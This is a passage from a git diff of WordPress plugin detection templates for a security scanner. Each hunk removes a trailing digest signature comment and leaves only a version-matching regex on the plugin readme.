4a0a0047304502200dfa9e916a92e32b1897aa37b9312e69881ad716cfbd1d49efe3634e48991cd0022100ee16719a1dfe4c5260f2e32b7bc71618bfd6edac6179e86499d0d1dbc5847fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index cdf4e204dc..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b748876a2cffb9fc37ad26d802789c6a520a50ccb49ed2bc9c565c970348bc05022100d8426557ea447d9acee1b7dd46bfc774e74f8b705593363c736e9f952772a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d3dc28dd2a..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e351bd812c0326f0ac6bc149f3fd8ad2923a5bcb0c9a75e6e9848d164876cab022100ca9b07a2ac44542ac88c36ed4ce6ccdbc858557e49cadab28dcefc8537afaf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 6b0a14526c..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eb7a75fb0085504380d4c384e06909bb651c6d9695e12ea0bdd40e9f035e5ea022100d1cdbd41eadc82e7af1752385ea640f8940d5d2d09fe8a698d832e09ae678267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4a5f181219..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1da0482d87fcfd4e9440080aa8605a912b4574b70458453d920376c73fdf9c20221008c4fc74b6844c8c5ec208217e6b740446741cc705530bafad1e3fac68f442ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 861df0f71c..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202dec65985fbfb9da1033e2d76f9555849a9bbc003f3f6a6fe78de4b016ff03b002204dafc22fa330d29133cb80e168366d786434cf791bc9c8a8fbe144e2a6dafc6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e56a64d4d7..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071d04f83ebfaa67eddb4f6b9db3b6d0074748ef05fb7d0687da3d6e17721147e02203895100c1e1492c8b29ede91d278abd746f64049c3c8cea019316680ec715ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index cf15e45e29..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203069d24603d84ebd9296d3113292ba426f06ca190039bb8df86adae68006ea9c022100ffdc45e4b21a165717dab8d9a39b4e2177b2f2dd88236391dcd5d47584a7a878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index e012e13177..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd7a3ea168f0180134a46eea79628ce4e6209138c9b954a2036b88beeb244d5a022100efa434e54ddb8e02c58966c0000e69b12a8b48483a769ac39938bac6c55c6c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 1d6b39a398..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008175acbf80e035ccb6259ba23d4c3db3bbf996fdd322092ea13b1e2bd8bf18ec022027076fb7723c38a124e5654bfd8c7a73a767a4398b86fd7bb2a5d040b8e4d09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 6c92036c8d..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025ab4b39f115aae8153279a941269230f09455fa6ad470fe9a2721210218c883022100a6cbfb5ded92c1f95dddd778836c5e58acea52191b7948abf62608d556e735d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 4a665b8960..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b862d04f0a7a16b9fc4ea2df04acd1aed17de491d26d03f1b57bb716ba9a4bad02210080408714475925655c467069c5db6e225d4e1e1bf95e68a4ed229bac41481817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 863522bf1d..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0080fc1491182215cc86adb95ca635991a385a8388f1d5ac10c10a1ff4ab76e0220616fa69adc89fd01960d092924b0f354075388e431a81332e1ea662fc408ce10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 487bd4f910..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1958ee9414971993baf64a11212d6a8a5e609481b4a4e6b1f85bcf763b189f1022100ed5067ad4bb7a185ae5c37360cc61fe3ecc47583162675565b47678b72973ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index ecd98f6b08..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da66ca71afe555dab410fe34a0b8e2f7976f2fa3c769f4e238361523d56d95fa02206b3e35ad57a422958daa04a85da73378a3718a6a17f57ff448e31d49d1294567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 666b6decf8..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcc288942f53c8e1ec5a1dfb91c87cbbb8f60e189267ee736e992fa3f738eef30220042ab9be4b520bc411b7a8c195d511b08f80104568ce4b8583bcbfdf0b6f07a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 23694173df..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b82497efafc269d4414f7737d13b0bccdb873c8817d44f6dec61859bfd922100221008aa78d84819dfec246dbfe7a4c619ebdc6f576c5ec65da9b704e9a7eb364748e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index d65055a3e6..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085b4fd770dfa661f81bfc77fcf505342391e6d7b0721aca5e6399f04542dd6fc022100951ce549addcd1a6dcdf2bfb699591ede6ab07a7c12028e79e4058322e13ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 4b7f05a78b..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e566aa07fa0d3703964b107cd0bccd39761853a2cccbea866b05ae3b959cc100220665b95c2725d338737ce0484399b6d5b799ae75c2908d3952db1b63463d9fdd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 5c51a925b0..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205caec4b547bc85e47b2909a4ca8cd1dfcdc3fdcdfacfb29e3e23d0c8d77fe8fd022100a3ba8e3306207aa8ca6a977b0061de572a1f1218a8dad9fe1f41639951ea18bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 40fdd8aa1d..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab33ab960bd254b43988d4eb516c303c728df599bd38144883ccef0335163648022100a645d4bb15d29e4532399d987839a2ded8c914c321e6bc0324669458fbb1b604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 9709ebf1e5..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053de2a3f3609d09f17b179b01dfe45509cf0ba754f73c16ffd5c0b0ea6c5f049022100896101016b646a73527ea408edc09bbd55898ed7b8c72cd0c507f1ceb6956b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index c9822ca1a3..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049a36f46d127c5aaa591e63f1eab1b173d9099b58a680da2198b5260990640ab022100bb6776c205fc892c6c17d973734315d556ded32932f5ee253851b5042a559730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 76af04fb15..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0ea23afa4741fd3efc7217774934521786c197c68a97d821c6a0a0231fbce5602204e439c844ab619fdec229ca7a9c5ef82a2f730af81144b7e10361f80063ef00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 35fc8a9678..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b14a708aa3410fb1dcfd245e8faf2bde934a440841e3b7fcad9f42be7e9c058022100d48eb97f15c1c638bdbf62c186c3560c68b8f37db70f24d3ef6a8e0f3cbb1b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 534f8dc8e6..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c45c1feb21a189012ccf13eb61ac7c07382913b275cb14f046601a46dfe49baa0220572693fdc965f9a33d51b81fc60d671ad82e7d5f4b37133dfac637a48515b42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 1377a3b95e..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2b9acfcdd2beacfd281d03ee8629f34514c969eab251dcb908e8e1b32aa812a02202479485e8d51c76922e387bc70bd8020db87352ed3179de160a1cc83f54726ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 192ebbe2f6..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c67f3a4e61b94cda233ab41ee5b2ad88772e775e993c94d2cef9569cba2bcc9902201266b973bf09a9024886a997ac55a4ccf1e35f7b392ef11e93fce946e7627927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 062aaaf76e..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023485b9d1c97ef81caaf28db89d189f080c7c703b88951fd38ea03201228141f022005b641e18ee83930af7d9c58e2f3b009acbb8b98d86d62fef20ee0d9ee65a6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 0f568960dd..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed96f8e99c42e97f3ba1027d0fd404a055aa9f487778e29556be3134c1b0411e02206ef65ba327dd6ea6731af2f33e4ce841ce65338d2af14071bd70d63a9de42182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index d0788d69a1..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d3983bc5c1b11d6f1e37e06c26e46d062658f372f1036e14079ef2c055f178a0220529cf91b9dc008e90223531238ca83851ae84132fc5136de3d82b25171f57c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 7ad8f7fcb1..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024adddef1cc8575045628e710a92492932ea826dea9675d8184feff4aa53692a02207f2c22cb18be07a65c18d859d2210d7b6b3b36499dcd893541e3fd2a01fcca4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5b3756a8e6..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054db2a79331ce53cfa3377b5007bf2a2813e266520bf7b67c9b39cb4aa1fce87022100c7d8aa26237209fbe40d963bc6686ad694877db2be39881ad842e1895ce009f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc21c8f2db..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5a7ebe491eac618d380f20010d3ee8e990e25cba87819a8a6038cf67e79251a022100fd900801243ea273ecf33b99fcd808204a2854adb58264f57118331195420878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 39139aa0ac..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070a70eacb3d380d3a14896ca1465cf52e2a5931b8e1127fb8fad8613b6e00c9702205f5f214c3c3bcd063129741fb132ee08bc3915517ef60cd8ff751fa9a816873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2498267cdb..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe55a94bc34146352ee1f7a00f8b921744537cc10341a01ca0557c796c82e72402207e117c2003c306137f6ee05ec16be75d4ac3b1b5746b95d5e296bd5d4d9e2453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 310553eab4..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001f906d2d1443971efbab8036bf86942ee1001971094887b274fe6bdd7212897022062e2618ac132770d8a570a3d367136ec7c8e76fdefb2dc9b3bc0ab8b32944d6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index a5627a7356..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100996c65504fa276044ff9a72b4ffe8a597f69cec349e8b30793cda937e34eca51022100a6b6262a8058645b3e8270081f059d20c74ef2d8c2463da7e188dcc22c0ac6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 4e07bace10..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a4dd51509f4ddbb3e2d418da8ff0d7e0b7445ddb2be368fa04863c40b7ee15402206c6114fd46261569eb9172a017efb7fcacf661a3d6a1ebd0666982cd04a8edf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 62f827371c..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f5906419027ca4e28dc5b5184a6fd3feaa0849a2bf1ef6f0140e71131b736d3022027400b303eff4f75389da5c5589f5f771c882484daeed6c81501b3579dcac971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 0234036af9..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c839da4ffae139e62619270f1fb153b917417a8bc0f02e0da3aebac03a12ae402201c104d8e26358d74626544d7a7e7f4fba7e3e69ce633cbcad378c6a905327ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 27a1e88fcf..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059e9b8b59ef8a551ce14b2421a39e935471f958bde959a0c93e6d6892ca68ef6022005856757f5c912a57b2b7b42ade6bdd5e2227620728baa6689420fa211207d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 74c06b9e8d..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bf1eb2f2c55f526ca76f8c5c9c25ac399f8c0e82f0b3a10dca29751597b5926022100b37309bff87f069707fdb6e039fb68dd6ed64c9cc3f0805e254e6470cfd6149c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 4dfda70cca..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f121452f259672f5b407053694c483358ccee96bd2395aa631cc1198e76bde7022100d49938705cb53862344a047ad2fc4477979aeaa6a52368e55d4b65c358b3dce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 8e23752da0..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7afa6dcad2825c17c4ad45c79336afb59dc3afa80bafbb6f6779d4d7a178a70022100831f2ff96aac7869011749e444b59ba42b13ac929f7f1b34d7df3f8c8b73900f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 6b120a1097..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad2ef908c15967ebb585997a30acada7f70043ed1b3db5f2726a19aae0775471022023285d1247296434ac8753be7c16f4c30019f6221806e75de7d469153308929d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 71cf83cb9b..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201e3c7e6476ab9770c7729acbef636ae99c70faf2276462d8856ba0f5f220e7d102210092b8e793c9004c8a637cea84f2a8d1ae5458ec703a38c25ece127475ecffb8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index a6238f92cd..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220712a774777fd430603104a71ca2050ee25b5f6059d409aa01d11ce854be41f22022100864927351753149ec79a124b443d634df21312f1443773f95f1efcea63d00d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml 